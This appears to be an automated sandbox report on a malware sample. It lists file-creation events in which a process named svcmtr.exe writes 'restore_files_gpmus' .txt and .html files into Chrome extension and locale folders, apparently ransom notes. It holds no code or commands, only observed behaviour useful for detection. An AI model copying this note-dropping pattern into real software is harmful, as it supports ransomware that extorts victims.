Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\cs\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\da\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\da\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\de\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\de\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\el\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\el\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\en_GB\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\en_GB\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\en_US\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\en_US\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\es\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\es\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\es_419\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\es_419\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\et\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\et\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\fi\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\fi\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\fil\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\fil\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\fr\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\fr\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\he\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\he\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\hi\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\hi\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\hu\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\hu\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\id\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\id\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\it\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\it\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ja\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ja\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ko\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ko\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\lt\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\lt\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\lv\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\lv\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ms\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ms\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\nl\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\nl\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\no\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\no\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\pl\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\pl\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\pt_BR\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\pt_BR\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\pt_PT\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\pt_PT\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ro\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ro\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ru\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ru\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\sk\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\sk\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\sl\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\sl\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\sr\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\sr\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\sv\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\sv\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\th\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\th\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\tr\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\tr\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\uk\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\uk\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\vi\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\vi\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\zh_CN\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\zh_CN\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\zh_TW\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\zh_TW\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_metadata\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_metadata\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\ar\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\ar\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\bg\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\fr\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\he\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\he\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\hi\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\hi\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\hr\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\hr\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\hu\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\hu\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\id\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\id\restore_files_gpmus.htmlJump to behavior
